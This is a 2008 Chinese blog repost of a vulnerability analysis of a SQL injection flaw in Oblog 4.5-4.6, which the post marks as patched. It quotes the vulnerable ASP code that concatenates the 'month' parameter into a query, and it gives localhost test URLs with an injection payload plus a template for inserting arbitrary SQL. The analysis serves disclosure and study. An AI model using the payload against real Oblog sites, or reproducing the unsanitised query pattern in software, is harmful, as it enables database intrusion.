夜火博客

Oblog最新注入漏洞分析(已修补)

2008-6-30 16:43:51  分类:技术文章  作者:xloong 已被围观loading 次 被网友评论2条 我要评论

Date：2008-5-15
Author：Yamato[ BCT ]
Version：Oblog 4.5-4.6 sql

代码分析：

文件In/Class_UserCommand.asp :

strMonth=Request("month") //第63行

strDay=Request("day")

……

Case "month" //第84行

Dim LastDay

G_P_FileName = G_P_FileName & "month&month=" & strMonth

strDay=Left(strMonth,4) & "-" & Right(strMonth,2) & "-01"

mYear=Left(strMonth,4)

mMonth=Right(strMonth,2)

If InStr ("01,03,05,07,08,10,12",mMonth)> 0 Then

LastDay = "31"……

Else //第109行

SqlPart = " And Addtime >='"&strMonth&"01' AND Addtime < '"&strMonth&LastDay&"' "

构造合适的变量strMonth进行注射

测试方法:

http://localhost/oblog/cmd.asp?do= month&month=2008’ and user>0--01

strDay变量从month中获得日期数据，并判断strDay是否为日期数据。所以构造的注射语句为：

http://localhost/oblog/cmd.asp?do= month&month=2008’(自己的sql语句)--01

执行sql语句采用rst.Open strSql,Conn,1,1

不能修改记录集.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载，请注明： 转自：夜火博客 [ http://www.15897.com/ ]

本文链接地址： http://www.15897.com/blog/post/Oblog-SQL-injection-loophole-latest-Fixes.html

Tags: Oblog   注入   漏洞信息   技术类  

已有2位网友对本文做了一针见血的评论 【我要评论】